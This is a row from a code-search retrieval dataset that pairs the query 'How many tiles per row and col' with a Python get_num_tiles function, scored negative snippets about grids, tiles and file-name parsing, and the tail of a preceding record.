[ "0.7414556", "0.73649496", "0.71413463", "0.6696102", "0.62867755", "0.6165321", "0.6104715", "0.59432495", "0.59432495", "0.59264004", "0.59072345", "0.59054977", "0.5792332", "0.5791462", "0.577605", "0.56787", "0.5672523", "0.5659785", "0.5647485", "0.56438744", "0.5634939", "0.56093234", "0.55983853", "0.55979973", "0.556724", "0.55332816", "0.5486267", "0.54659766", "0.54580766", "0.54553646", "0.5437434", "0.542988", "0.5428227", "0.54176503", "0.54163903", "0.5409484", "0.5404987", "0.5396085", "0.53905827", "0.5357094", "0.53273004", "0.5316445", "0.5292879", "0.52091867", "0.51833105", "0.5170589", "0.5160073", "0.5151612", "0.51450187", "0.513637", "0.51344365", "0.5129685", "0.5121901", "0.50986105", "0.50804913", "0.5075868", "0.5060085", "0.50511724", "0.5046792", "0.50413024", "0.5039114", "0.50359815", "0.50306916", "0.501262", "0.50110114", "0.5008893", "0.500265", "0.500265", "0.5000502", "0.4997186", "0.49962297", "0.49893793", "0.49869215", "0.49761775", "0.49737465", "0.49729395", "0.4972186", "0.4955364", "0.49479806", "0.49399504", "0.4925214", "0.49246854", "0.4915893", "0.49142054", "0.49052826", "0.48804337", "0.48799646", "0.48798898", "0.4878928", "0.48734272", "0.48690715", "0.48684075", "0.4867839", "0.48642847", "0.48595428", "0.48588294", "0.48502856", "0.48502856", "0.48457915", "0.48437372" ]
0.7516535
0
Extract EPSG number from file name.
def get_proj(fname):\n    fname = fname.split('_') # fname -> list\n    i = fname.index('epsg')\n    return fname[i+1]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_proj(fname):\r\n\r\n fname = fname.split('_') # fname -> list\r\n i = fname.index('epsg')\r\n return fname[i+1]", "def _epsg(self):\n info = self._info['coordinateSystem']['wkt'].rsplit('\"EPSG\",', 1)[-1]\n return int(re.findall(r\"\\d+\", info)[0])", "def get_version_filename(filename):\n return re.search(r'\\d+', filename).group(0)", "def get_num_from_file(file_name):\n basename = file_name.partition('.')[0]\n first, second = basename.split('_')\n num = second.replace(\"genome\", '')\n num = num[1:]\n return int(num)", "def filename_from(url):\n filename = url.split('/')[-1]\n return filename", "def extract_filename(str):\n regex = r\"([0-9_-]+).jpg\"\n matches = re.search(regex, str)\n if matches:\n return matches.group(1)", "def get_radius_from_grfile(grfile, default=0):\n match = re.findall('(\\d+)', grfile)\n if len(match) > 0 and str(grfile).endswith(str(match[-1]) + '.gr'):\n return int(match[-1])\n return default", "def parseFilename(self, filename):\r\n match = self.filename_regex.match(filename)\r\n if match is None:\r\n # TODO?: Raise exception?\r\n '''print \"Filename\", filename, \"unrecognized!\"'''\r\n return None\r\n lat = int(match.group(2))\r\n lon = int(match.group(4))\r\n if match.group(1) == \"S\":\r\n lat = -lat\r\n if match.group(3) == \"W\":\r\n lon = -lon\r\n return lat, lon", "def get_ens_num(file):\n f = 'ens' + '(\\d+)'\n match = re.search(f, file)\n if match:\n return int(match.group(1))", "def parse_num(path):\n nbasename = path.basename.lower()\n if nbasename.startswith(nprefix):\n try:\n return int(nbasename[len(nprefix) :])\n except ValueError:\n pass", "def get_filename(url: str) ->str:\n if 'drive.google.com' in url:\n return _extract_google_drive_file_id(url)\n url, filename = os.path.split(url)\n return filename or os.path.basename(url)", "def extract_file_extension(url_file):\n pattern = re.split(\"\\.\",url_file)\n return pattern[-1]", "def _filename_from_url(url):\n file_name = url.split(\"/\")[-1]\n return file_name", "def filename(self):\n _, tail = os.path.split(self.url)\n return self.folder + '/' + tail[:-4] + '/' + tail[:-3] + 'shp'", "def _get_file_name(url: str) -> str:\n url = url.strip('/')\n result = findall(r'/(\\w+\\.\\w+)[?|$]', url)\n if result:\n return result[-1]\n return url.split('/')[-1]", "def get_extension_from_filename(filename):\n return filename[-4:]", "def url_file_name(url):\r\n return url[url.rfind('/') + 1:]", "def extract_id(file_path):\n # An example of file path is AlkEthOH_tripos/AlkEthOH_chain_filt1/AlkEthOH_c555.crd\n return os.path.splitext(os.path.basename(file_path))[0][9:]", "def get_name_from_filename(filename):\n return filename[:-4]", "def extract_filefamilyname( self, filename ):\n matchobject = re.search( r\"^.*_\\d\\d\", filename )\n if matchobject is None:\n return filename\n else:\n familyname = filename[0:(matchobject.end()-3)]\n return familyname", "def filename(self,imgurl):\n if imgurl.find('/'):\n return imgurl.rsplit('/', 1)[1]", "def get_name_from_file(filename):\n return filename.split(\".\")[0]", "def filename(self):\n return os.path.basename(self._spatial_filename)", "def get_imageId_from_fileName(filename, id_iter):\n filename = os.path.splitext(filename)[0]\n if filename.isdigit():\n return int(filename)\n return id_iter", "def get_imageId_from_fileName(filename):\n filename = os.path.splitext(filename)[0]\n if filename.isdigit():\n return int(filename)\n return id_iter", "def get_filename(self) -> str:\n fname = self.url.split(\"/\")[-1]\n if \",\" in fname:\n _fname, _i = 
fname.split(\",\")\n _split_fname = _fname.split(\".\")\n _name = _split_fname[0]\n _extension = _split_fname[-1]\n return _name + _i + \".\" + _extension\n else:\n return fname", "def return_episode_num(name):\n return int(name.split(\".\")[0].split(\"ep_\")[1]) # Use split to return only the episode number needed to sort the files in increasing order", "def filename_par(filename, searchstr):\n\tstart = filename.find(searchstr) + len(searchstr)\n\tfinish = start + 1\n\twhile unicode(filename[start:].replace(\".\",\"\"))[:finish-start].isnumeric():\n\t\tfinish += 1\n\treturn float(filename[start:finish-1])", "def Get_epsg(g, extension = 'tiff'):\n try:\n if extension == 'tiff':\n # Get info of the dataset that is used for transforming\n try:\n dest = gdal.Open(g)\n except:\n dest = g\n g_proj = dest.GetProjection()\n Projection=g_proj.split('EPSG\",\"')\n epsg_to=int((str(Projection[-1]).split(']')[0])[0:-1])\n \n if extension == 'GEOGCS':\n Projection = g\n epsg_to=int((str(Projection).split('\"EPSG\",\"')[-1].split('\"')[0:-1])[0])\n\n except:\n epsg_to=4326\n #print 'Was not able to get the projection, so WGS84 is assumed'\n \n return(epsg_to)", "def _get_aso_id_from_file_name(self, filename: str) -> str:\n id_parts = filename.split('/')\n prefix = id_parts[1]\n suffix = id_parts[-1].split('.')[0].zfill(3)\n if len(suffix) == 5:\n return suffix\n else:\n return prefix + suffix", "def part2(filename: str) -> int:\n data = parse(filename)\n return index_of_floor(data, -1)", "def get_ext(url):\r\n root, ext = splitext(url)\r\n return ext", "def get_revision(name):\n #return name[-6:-4]\n base,ext = os.path.splitext(name)\n return base[-2:]", "def getNumberFromName(self, idx):\n\t\tfile = self.all_file_names[idx]\n\t\tnumber = file[4]\n\t\tif file[5].isdigit(): \n\t\t\tnumber += file[5]\n\t\treturn int(number)", "def find_coords_string(file_path):\n\n match = re.search(\n \"([-]?[\\d]{1,3}\\.[\\d]{1,3}[_,][-]?[\\d]{1,3}\\.[\\d]{1,3})\", file_path\n )\n if not match:\n return None\n coords_string = match.groups()[0]\n return coords_string", "def get_file_ext(filename):\n return filename.rsplit('.', 1)[1]", "def _parse_id(line):\n ablt_pat = re.compile('(?<=2014_)[0-9]{12}(?=.jpg)')\n orig_pat = re.compile('(?<=[0-9]{16}_)[0-9]+')\n mat = ablt_pat.search(line)\n if mat is None: #original image\n mat = orig_pat.search(line)\n assert not mat is None, (\"this line does not contain a COCO image id: {}\" % line )\n return line[mat.start(): mat.end()], 'orig'\n else: #ablated image\n num = line[mat.start(): mat.end()]\n return str(int(num)), 'ablt'", "def name_from_path(path):\n return path[0:-3]", "def getExtension(filename):\n return filename[filename.rfind('.'):]", "def extract_name(text):\n name = re.sub(r\"<br>\", \"\", text)\n name = re.sub(r\"\\(\\d\\.\\d\\)\", \"\", name)\n return name", "def _get_tweet_number(tweet_url):\n path = urlparse.urlparse(tweet_url)[2]\n number = path.split('/')[-1]\n return '#%s' % (number,)", "def get_extension(filename: str) -> str:\n return filename.split(\".\")[-1]", "def fileId_from_url(url):\r\n raw_fileId = re.findall(\"~[A-z.]+/[0-9]+\", url)[0][1:]\r\n return raw_fileId.replace('/', ':')", "def _extract_identifier(self, publication):\n return self._parse_identifier(publication.metadata.identifier)", "def fileId_from_url(url):\r\n raw_fileId = re.findall(\"~[0-z.]+/[0-9]+\", url)[0][1: ]\r\n return raw_fileId.replace('/', ':')", "def generate_site_file_num(paper_name:str, file_num:str='auto') -> str:\n if type(file_num)==str and file_num=='auto':\n files 
= [f.split('_')[0] for f in os.listdir(paper_name) if '_sites.json' in f]\n nums = [0]\n for f in files:\n r = re.findall(r'\\d+', f)\n if r and len(r)>0: nums.append(int(r[-1]))\n else: nums.append(0)\n file_num = sorted(nums, reverse=True)[0]+1\n return str(file_num)", "def id_from_url(url):\n return url.split('-')[-1].split('.html')[0]", "def parse_filename(url):\n # extract the URL path\n url_path = urlparse.urlparse(url).path\n filename = url_path.split('/')[-1]\n\n # make loose assumption the file name is for an HTML page\n if len(filename) < 1:\n filename = 'index.html'\n\n return filename", "def url_filename(url):\n return os.path.basename(urlparse.urlparse(url).path)", "def parse_filename(cls, filename):\n words = filename.split('_')\n return words[0], int(words[1][1:]), int(words[2])", "def get_image_index(name: str):\n base_name = os.path.basename(name)\n nums = pattern.findall(base_name)\n if len(nums) != num_count:\n raise BaseException(f\"can't exact index from the string: {name}\")\n return float(nums[num_sort_index])", "def file_name(path):\n return os.path.basename(path).split('.')[0]", "def extract_journal(name):\n match = re.search(\"\\d+\", name)\n if match != None: \n return name[:match.start()], int(name[match.start(): match.end()])\n else: \n return \"\", 0", "def _get_track_name(self, filename):\n return os.path.basename(filename)", "def get_filename(img_path):\n filename = os.path.splitext(img_path)\n return os.path.basename(filename[0])", "def get_year(url):\n year = re.search(\"\\d{4}\", url).group(0)\n return int(year)", "def parse_glider_filename(filename):\n head, tail = os.path.split(filename)\n\n matches = re.search(r\"([\\w\\d\\-]+)-(\\d+)-(\\d+)-(\\d+)-(\\d+)\\.(\\w+)$\", tail)\n\n if matches is not None:\n return {\n 'path': head,\n 'glider': matches.group(1),\n 'year': int(matches.group(2)),\n 'day': int(matches.group(3)),\n 'mission': int(matches.group(4)),\n 'segment': int(matches.group(5)),\n 'type': matches.group(6)\n }\n else:\n raise ValueError(\n \"Filename ({}) not in usual glider format: \"\n \"<glider name>-<year>-<julian day>-\"\n \"<mission>-<segment>.<extenstion>\".format(filename)\n )", "def get_epsg(path):\n dataset = None\n layer = None\n srs = None\n try:\n\n driver = ogr.GetDriverByName('ESRI Shapefile')\n dataset = driver.Open(path, 0) # 0 means read-only\n layer = dataset.GetLayer()\n srs = layer.GetSpatialRef()\n #Set EPSG authority info if possible.\n srs.AutoIdentifyEPSG()\n return srs.GetAuthorityCode(None)\n\n finally:\n if srs: srs = None\n if layer: layer = None\n if dataset: dataset = None", "def get_script_name ( filename ):\n prio, sepa, name = filename.partition ( '-' )\n if name:\n try:\n prio_int = int ( prio, 10 )\n except ValueError:\n return filename\n else:\n return name\n else:\n return filename", "def get_projection(g, extension = 'tiff'):\n if isinstance(g, str):\n try:\n g = gdal.Open(g)\n print(type(g))\n except:\n print('path is not correct')\n else:\n pass\n # assert isinstance(g ,gdal.Dataset)\n try:\n if extension == 'tiff':\n # Get info of the dataset that is used for transforming\n g_proj = g.GetProjection()\n srs = osr.SpatialReference()\n srs.ImportFromWkt(g_proj)\n epsg_to = srs.ExportToProj4()\n else:\n epsg_to = \"+proj=longlat +datum=WGS84 +no_defs\"\n print('Was not able to get the projection, so WGS84 is assumed')\n except:\n epsg_to = \"+proj=longlat +datum=WGS84 +no_defs\"\n print('Was not able to get the projection, so WGS84 is assumed')\n return epsg_to", "def get_ext(url):\n\n path = 
urlparse(url).path\n ext = splitext(path)[1]\n return ext", "def extract_item_id(url):\n m = re.search('/([0-9]+)\\.htm', url)\n if m is not None:\n return m.group(1)\n else:\n return None", "def get_year(self, filename):\n year = self.file.replace('s24_', '').replace('.vrt', '')\n self.logger.info(f'This .vrt file contains data for the year {year}')\n return year", "def ld8_extract(self, text):\n return re.search('\\d{5}_\\d{8}', text).group(0)", "def get_filename_extension(filename):\n m = FILENAME_EXTENSION_RE.search(filename)\n return m.group(1) if m else None", "def get_filename(link):\r\n return link[link.rfind(\"/\") + 1:]", "def get_filename(path):\n return path.split('/')[-1]", "def just_the_name(path):\n return os.path.splitext(os.path.basename(path))[0]", "def extract_file_name(file_path):\n # ファイルパスからファイル名(拡張子含む)を取り出す\n file_name = file_path.split('/')[-1]\n # 拡張子を取り除く\n return file_name.split('.')[0]", "def get_filename(filename):\n \n return utilities.get_filename(filename)", "def _get_abgp_file_basename(OPTIONS):\n if OPTIONS.target:\n try:\n num_loci = OPTIONS.selected_num_loci\n except:\n num_loci = len(OPTIONS.loci) + len(OPTIONS.dnafiles)\n return \"%s.%s%sSL.\" % (ABFGP_VERSION,OPTIONS.target,num_loci)\n else:\n return \"%s.\" % ABGP_VERSION", "def get_ig_name ( base_name ) :\n return base_name + '-GW'", "def autolab_assignment_name(filename):\n m = re.search(\"(.*)_(.*)_[0-9]{12}.csv\", filename)\n if m:\n return m.group(2)\n return None", "def parse_name(self, name):\n domain_regex = None\n image_name = re.split('/', name)[-1]\n domain = None\n path = None\n port = None\n \n split_paths = re.split('/', name)[0:-1]\n if re.search('\\.', split_paths[0]) or split_paths[0] == \"localhost\":\n domain = split_paths[0]\n\n if re.search(':', domain):\n split_domain = re.split(':', domain)\n domain = split_domain[0]\n port = split_domain[1]\n \n path = '/'.join(re.split('/', name)[1:-1])\n\n return(domain, port, path, image_name)", "def get_extension(filename: str) -> str:\n return Path(filename).suffix[1:]", "def _get_info_from_filename(filename: str) -> dict:\n *parts, suffix = filename.split('.')\n dct = re.match(r'^(?P<name>[A-z0-9.]*)(-(?P<num_rows>[0-9]+))?$', '.'.join(parts)).groupdict()\n return {\n 'name': dct['name'],\n 'num_rows': int(dct['num_rows']) if dct['num_rows'] else None,\n 'format': suffix,\n }", "def get_scene_name_without_extension(self):\n return re.sub(r'\\.c4d$', '', self.get_scene_name())", "def _parse_gedi_granule_filename(gedi_filename: str) -> GediNameMetadata:\n\n gedi_naming_pattern = re.compile(\n (\n f\"({GEDI_SUBPATTERN.product})\"\n f\"_({GEDI_SUBPATTERN.year})\"\n f\"({GEDI_SUBPATTERN.julian_day})\"\n f\"({GEDI_SUBPATTERN.hour})\"\n f\"({GEDI_SUBPATTERN.minute})\"\n f\"({GEDI_SUBPATTERN.second})\"\n f\"_({GEDI_SUBPATTERN.orbit})\"\n f\"_({GEDI_SUBPATTERN.sub_orbit_granule})\"\n f\"_({GEDI_SUBPATTERN.ground_track})\"\n f\"_({GEDI_SUBPATTERN.positioning})\"\n f\"_({GEDI_SUBPATTERN.pge_version_number})\"\n f\"_({GEDI_SUBPATTERN.granule_production_version})\"\n f\"_({GEDI_SUBPATTERN.release_number})\"\n )\n )\n parse_result = re.search(gedi_naming_pattern, gedi_filename)\n\n if parse_result is None:\n raise ValueError(\n f\"Filename {gedi_filename} does not conform the the GEDI naming pattern.\"\n )\n return GediNameMetadata(*parse_result.groups())", "def get_group_id(url):\n base = 'maven2/'\n pos = url.find(base)\n if pos < 0:\n raise ValueError('Base not found in the URL')\n\n url2 = url[pos+len(base):]\n return url2.replace('/', '.')", "def 
get_name(path):\n return path.rsplit('/',1)[1]", "def get_file_extension(filename):\n # Find the first match from the list of supported file extensions\n extension = next((ext for ext in EXT_LST if filename.lower().endswith(ext)), None)\n return extension", "def get_urifilename(uri):\n up=urlparse.urlparse(uri)\n return split(up[2],\"/\")[-1]", "def simplify_job_name(name):\r\n name = name.split('/')[-1]\r\n if 'ver' in name:\r\n name = name.split('ver')[0] + '.ISO'\r\n return name", "def split_filename(path):\n filename = os.path.basename(path)\n name, extension = os.path.splitext(filename)\n region = name.split('.')[0]\n\n return region, name, extension", "def rootname(filename):\n name = os.path.basename(filename)\n root, ext = os.path.splitext(name)\n while ext:\n root, ext = os.path.splitext(root)\n return root", "def GcsBasename(path):\n return os.path.basename(path)", "def get_file_extension(filename):\n if not filename:\n return \"\"\n\n dotpos = filename.rfind(\".\")\n return filename[dotpos + 1:].lower() if dotpos != -1 else \"\"", "def genSampleID(path):\n head, tail = ntpath.split(path)\n result = tail or ntpath.basename(head)\n return genBaseName(result.split(\".\")[0]) # Gets just the sample name, cleans out the \".cleaned.[EXT]\"", "def get_filename(filepath):\n return os.path.basename(filepath)", "def just_the_name(path):\n name = os.path.splitext(os.path.basename(path))[0]\n return name", "def extract_number(word):\n number_flag = True\n number = ''\n word = word.rstrip('.').lstrip('.')\n for char in word:\n try:\n if char == '.' and number_flag:\n number += char\n else:\n int(char)\n if number_flag:\n number += char\n except:\n if len(number) > 0:\n number_flag = False\n continue\n return number", "def _retrosheet_filename(game_id, data_root):\n # game id is TTTYYYYMMDDN.\n team = game_id[:3]\n year = game_id[3:7]\n file_pattern = year + team + \".EV*\"\n file_path = os.path.join(data_root, \"retrosheet\", year, file_pattern)\n file_matches = glob.glob(file_path)\n return file_matches[0] if len(file_matches) else None", "def get_suburb(filepath):\n suburb = filepath.split(\"/\")\n suburb = suburb[1].split(\".\")\n suburb = suburb[0]\n return suburb", "def part1(filename: str) -> int:\n data = parse(filename)\n return floor(data)", "def getFileName(filepath):\n return os.path.splitext(os.path.basename(filepath))[0]", "def split_name(filename):\n # *********** My filename are in the format ./CaAl2Si2O8_T3_nvt_a12.5.\n # ******* so I can split their name with _ and take the compound and T from their name\n filename = filename.strip('./')\n temperature = str(int(float(filename.split('_')[1].strip('T'))*1000))\n acell = filename.split('_')[3].split('.outcar')[0].strip('a')\n return temperature, acell", "def get_file_name(file):\n return os.path.splitext(os.path.basename(file))[0]", "def get_stock_from_path(pathname): #{{{\n return os.path.splitext(pathname.split(\"/\")[-1])[0]", "def filename_ext(filename):\n base = os.path.basename(filename)\n return os.path.splitext(base)[1][1:]" ]
[ "0.63735604", "0.62062746", "0.6061637", "0.58868164", "0.5818382", "0.5740342", "0.5669474", "0.5658069", "0.5641101", "0.5620341", "0.5620254", "0.56191593", "0.56164837", "0.56108224", "0.5606117", "0.55956405", "0.5589816", "0.558568", "0.557769", "0.5521931", "0.55009794", "0.5497475", "0.5487516", "0.5469965", "0.5462271", "0.54598093", "0.54462576", "0.5428249", "0.5417183", "0.5403374", "0.53905576", "0.5389262", "0.53718275", "0.5353585", "0.5343735", "0.53195184", "0.5298148", "0.5292429", "0.52832526", "0.5278958", "0.52618", "0.52598923", "0.5259843", "0.5243614", "0.5239973", "0.522567", "0.52236646", "0.5220286", "0.5204501", "0.52010834", "0.51985794", "0.5196815", "0.51967365", "0.51880157", "0.5173927", "0.5172193", "0.51686585", "0.5166954", "0.5163242", "0.5152859", "0.5145969", "0.5137598", "0.5125803", "0.5121566", "0.5120476", "0.5118646", "0.5118029", "0.5111328", "0.5111219", "0.51106036", "0.51100296", "0.5107405", "0.51072514", "0.51062405", "0.5099925", "0.5088399", "0.50879496", "0.5081162", "0.50810194", "0.50714535", "0.50626326", "0.5062484", "0.5049791", "0.5049465", "0.50471723", "0.5044453", "0.50437176", "0.5042747", "0.50392014", "0.503201", "0.50309116", "0.50190705", "0.5018164", "0.5013063", "0.5012467", "0.5010993", "0.5006202", "0.50002193", "0.49996755" ]
0.6381265
1
How many tiles per row and col > (ny,nx).
def get_num_tiles(grid_bbox, dxy):\n    xmin, xmax, ymin, ymax = grid_bbox\n    return (int(np.abs(ymax-ymin)/dxy), int(np.abs(xmax-xmin)/dxy))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def num_tiles(self):\n return self.num_row_tiles * self.num_col_tiles", "def get_num_tiles(rows, cols, row_tile_size, col_tile_size):\n num_row_tiles = math.ceil(rows / row_tile_size)\n num_col_tiles = math.ceil(cols / col_tile_size)\n return num_row_tiles, num_col_tiles", "def getNumTiles(self):\n return self.w * self.h", "def getNumTiles(self):\n return len(list(product(list(range(self.width+1))[1:], list(range(self.height+1))[1:])))", "def getNumTiles(self):\n return self.height * self.width", "def getNumTiles(self):\n return (self.width) * (self.height)", "def getNumTiles(self):\n #raise NotImplementedError #refer https://docs.python.org/2/library/exceptions.html\n return self.width * self.height", "def getNumTiles(self):\n\t\treturn self.numTiles", "def voxel_count(self):\n return self.cols * self.rows * self.sections", "def num_cells_for_rows(self, rows):\r\n return (rows * rows + rows) // 2", "def get_nr_of_misplaced_tiles(board):\n result = 0\n\n for idx, val in enumerate(board):\n if idx != val:\n result += 1\n\n return result", "def tile_size_2d(self):\n return 32.0, 32.0", "def rectangles_in_grid(x_f, y_f):\n count = 0\n for x in range(x_f):\n for y in range(y_f):\n for i in range(x, x_f):\n for j in range(y, y_f):\n count += 1\n return count", "def ncells(self):\n return self.izone.size", "def getNumTiles(self):\n return self.numTiles\n #raise NotImplementedError", "def count_tilings(n: int) -> int:\n if n < 5:\n # handle recursive base case\n return 2**(n - 1)\n else:\n # place each tile at end of row and recurse on remainder\n return (count_tilings(n - 1) +\n count_tilings(n - 2) +\n count_tilings(n - 3) +\n count_tilings(n - 4))", "def _count_seen_occupied(grid: List[List[str]], row: int, col: int) -> int:\n count = 0\n for dx in [-1, 0, 1]:\n for dy in [-1, 0, 1]:\n if not (dx == 0 and dy == 0):\n count += 1 if _is_occupied(grid, row, col, dx, dy) else 0\n return count", "def num_black_neighbors(tile, tiles):\n return sum([tiles[add(tile, step)] for step in NEIGHBORS])", "def no_of_misplaced_tiles(state):\r\n h1 = 0\r\n goal_state = [[0], [1, 2, 3], [4, 5, 6], [7, 8, 9]]\r\n for y in range(len(goal_state)):\r\n for x in range(len(goal_state[y])):\r\n if state[y][x] != goal_state[y][x]:\r\n h1 += 1\r\n return h1", "def get_size_of_grid(self):\n row = 0\n column = 0\n if int(self.var1.get()) == 1:\n row, column = 6, 6\n\n if int(self.var2.get()) == 1:\n row, column = 7, 6\n\n if int(self.var3.get()) == 1:\n row, column = 7, 7\n\n if int(self.var4.get()) == 1:\n row, column = 8, 8\n\n return row, column", "def num_cells(self):\n if hasattr(self, '__num_cells__'):\n return self.__num_cells__\n if self.x is not None:\n return self.x.size(self.__cat_dim__('x', self.x))\n if self.boundary_index is not None:\n return int(self.boundary_index[1,:].max()) + 1\n assert self.upper_index is None and self.lower_index is None\n return None", "def count_island(row, col, island):\n count = 0\n for i in range(row):\n for j in range(col):\n count = count + floodfill(i, j, row, col, island)\n return count", "def rows(self) -> int:\n return self.__squares.__len__()", "def calculate_dimensions(self):\n x_coordinates = np.sort(self.grid['x'][:, 0]) # first x node\n self.nr_nodes_z = np.where(x_coordinates == x_coordinates[0])[0].size\n self.nr_elements_x = self.elements.shape[0] / (self.nr_nodes_z - 1)\n self.nr_nodes_x = self.nr_elements_x + 1\n self.nr_elements_z = self.nr_nodes_z - 1", "def __FreeTiles(self, grid, log=False):\n\n x_pos, _ = np.where(grid == 0)\n return len(x_pos)", "def 
grid_point_count(self):\n return pytools.product(self.grid_point_counts())", "def __len__(self) -> int:\n return len(self._tiles)", "def calculate_min_max_tiles(self):", "def numPixels(self):\n\t\treturn self.size", "def numPixels(self):\n\t\treturn self.size", "def get_cells(self):\r\n return \\\r\n (self.nx-1 if self.nx>1 else 1)* \\\r\n (self.ny-1 if self.ny>1 else 1)* \\\r\n (self.nz-1 if self.nz>1 else 1)", "def get_nb_element_per_dimension(recipe):\n return len(recipe[\"r\"]), len(recipe[\"c\"]), len(recipe[\"z\"])", "def columns(self) -> int:\n return self.__squares[0].__len__()", "def test_room_has_tiles(self):\n self.assertEqual(self.room.tile_set.count(), self.room.grid_size ** 2)", "def dimensions():", "def getAdjacentCount(grid, x, y, X, Y, char):\n count = 0\n try{\n if x == 0:\n\n if y == 0:\n\n if x == X-1:\n\n if y == Y-1:\n }", "def calculate_grid_dimensions(num_items, num_columns=None):\n if num_columns is None:\n num_rows_columns = int(math.ceil(math.sqrt(num_items)))\n return num_rows_columns, num_rows_columns\n else:\n num_rows = int(math.ceil(num_items / num_columns))\n return num_rows, num_columns", "def dim(self) -> int:", "def part_one():\n return len(numpy.where(grid > 1)[0])", "def size(self):\n return self.__row_count * self.__col_count", "def largest_island(grid: list[list[int]]) -> int:\n rows = len(grid)\n cols = len(grid[0])\n\n visited = [[False for _ in range(cols)] for _ in range(rows)]\n max_island_size = 0\n for i in range(rows):\n for j in range(cols):\n if grid[i][j] == 1 and not visited[i][j]:\n island_size = flood_island(grid, i, j, visited)\n max_island_size = max(max_island_size, island_size)\n\n return max_island_size", "def count_num_masked_tiles(subgrid):\n\n\tnum_masked_tiles = 0\n\tfor tile in subgrid:\n\t\tif (tile == MaskedTile.MASKED) or (tile == MaskedTile.FLAG):\n\t\t\tnum_masked_tiles += 1\n\n\treturn num_masked_tiles", "def Ncells(self):\n return len(self.cells)", "def _count_adj_occupied(grid: List[List[str]], row: int, col: int) -> int:\n count = 0\n if row - 1 >= 0:\n if col - 1 >= 0:\n count += 1 if grid[row - 1][col - 1] == '#' else 0\n if col + 1 < len(grid[0]):\n count += 1 if grid[row - 1][col + 1] == '#' else 0\n count += 1 if grid[row - 1][col] == '#' else 0\n if row + 1 < len(grid):\n if col - 1 >= 0:\n count += 1 if grid[row + 1][col - 1] == '#' else 0\n if col + 1 < len(grid[0]):\n count += 1 if grid[row + 1][col + 1] == '#' else 0\n count += 1 if grid[row + 1][col] == '#' else 0\n if col - 1 >= 0:\n count += 1 if grid[row][col - 1] == '#' else 0\n if col + 1 < len(grid[0]):\n count += 1 if grid[row][col + 1] == '#' else 0\n return count", "def count(grid):\n star='@'\n c = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j]==star: c += 1\n return c", "def numIslands(grid):\n # count to store each new island found\n count = 0\n # If the grid is empty, return 0\n if not grid:\n return count\n\n y_max = len(grid)\n x_max = len(grid[0])\n \n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == '1':\n dfs(grid, i, j)\n count += 1\n return count", "def _get_number_of_rows_to_process(self, bitsPerPixel):\n # TODO: do a better job estimating the number of rows to process.\n # Compute the number of pixels that fit under the memory limit.\n memLimit = (psutil.virtual_memory().available/\n (bitsPerPixel*(1024**2)))\n memLimit = int(50*np.floor(memLimit/10.0))\n numStackPix = memLimit*(1024**2)*8/bitsPerPixel\n\n # Grab the number of images and the shape of those image\n numImg, ny, 
nx = self.shape\n\n # Compute the number of rows to be processed in each chunk\n numRows = int(np.floor(numStackPix/(numImg*nx)))\n\n # Catch the case where ALL rows get handled at once\n if numRows > ny: numRows = ny\n numSections = int(np.ceil(ny/numRows))\n\n # Recompute the number of rows to be evenly spaced\n numRows = int(np.ceil(ny/numSections))\n\n return numRows, numSections", "def checkNumNeighbors():", "def number_of_patches(width, height, patch_size):\n n_patches_x = width // patch_size\n n_patches_y = height // patch_size\n return n_patches_x, n_patches_y", "def get_grid_width(puzzle: str) -> int:\r\n return int(len(puzzle) ** (1 / 2))", "def cellsize_2d(self):\t\r\n return self.dx * self.dy", "def main():\n row, col, island = make_matrix()\n print(count_island(row, col, island))", "def getNumGrids(self):\n c = list(self.gridVars.keys())\n return len(list(self.gridVars[c[0]].values()))", "def count_neighbors(self, row, col):\n neighbors = 0\n neighbors += self.get_cell_value(row - 1, col - 1)\n neighbors += self.get_cell_value(row - 1, col)\n neighbors += self.get_cell_value(row - 1, col + 1)\n neighbors += self.get_cell_value(row, col - 1)\n neighbors += self.get_cell_value(row, col + 1)\n neighbors += self.get_cell_value(row + 1, col - 1)\n neighbors += self.get_cell_value(row + 1, col)\n neighbors += self.get_cell_value(row + 1, col + 1)\n\n return neighbors", "def howManyNeigbors(board,row,col):\r\n\tneigbors = 0\r\n\tif board[row-1][col-1] == 1:\r\n\t\tneigbors += 1\r\n\tif board[row-1][col] == 1:\r\n\t\tneigbors += 1\r\n\tif board[row-1][col+1] == 1:\r\n\t\tneigbors += 1\r\n\tif board[row][col-1] == 1:\r\n\t\tneigbors += 1\r\n\tif board[row][col+1] == 1:\r\n\t\tneigbors += 1\r\n\tif board[row+1][col-1] == 1:\r\n\t\tneigbors += 1\r\n\tif board[row+1][col] == 1:\r\n\t\tneigbors += 1\r\n\tif board[row+1][col+1] == 1:\r\n\t\tneigbors += 1\r\n\treturn neigbors", "def get_grid_size(self, img):\r\n grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))\r\n grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))\r\n return grid_height, grid_width", "def numNeighbors(minesSet, row_index, cols_index, num_cols, num_rows):\n mines = 0\n for j in np.arange(max(0, cols_index-1), min(num_cols-1, cols_index+1)+1):\n for i in np.arange(max(0, row_index-1), min(num_rows-1, row_index+1)+1):\n if ((i, j) in minesSet):\n mines+=1\n return mines", "def test_can_traverse_wide_grid(self):\n grid = [[\"1\", \"0\", \"1\", \"1\", \"0\", \"1\", \"0\", \"0\", \"1\", \"0\"]]\n result = num_islands(grid)\n self.assertEqual(result, 4)", "def get_neighbors_of(cell, board):\n count = 0\n (x, y) = cell\n for cell in board:\n if cell == (x - 1, y - 1):\n count += 1\n elif cell == (x, y - 1):\n count += 1\n elif cell == (x + 1, y - 1):\n count += 1\n elif cell == (x - 1, y):\n count += 1\n elif cell == (x + 1, y):\n count += 1\n elif cell == (x - 1, y + 1):\n count += 1\n elif cell == (x, y + 1):\n count += 1\n elif cell == (x + 1, y + 1):\n count += 1\n return count", "def row_count(self):\n return self.well_count // self.col_count", "def getAdjacentWrapCount(grid, x, y, X, Y, char):\n count = 0\n # X, % Y gets spaces that are wrapped around the grid \n # Get x coordinates for adjacent grid spaces\n for i in [(x-1) % X, x, (x+1) % X]:\n # Get y coordinates for adjacent grid \n for j in [(y-1) % Y, y, (y+1) % Y]:\n # if the grid space is present and not the center of the grid spaces\n if (i, j) != (x, y) and grid[i][j] == char:\n count += 1\n return count", "def get_tile(self, row, col):\n # 
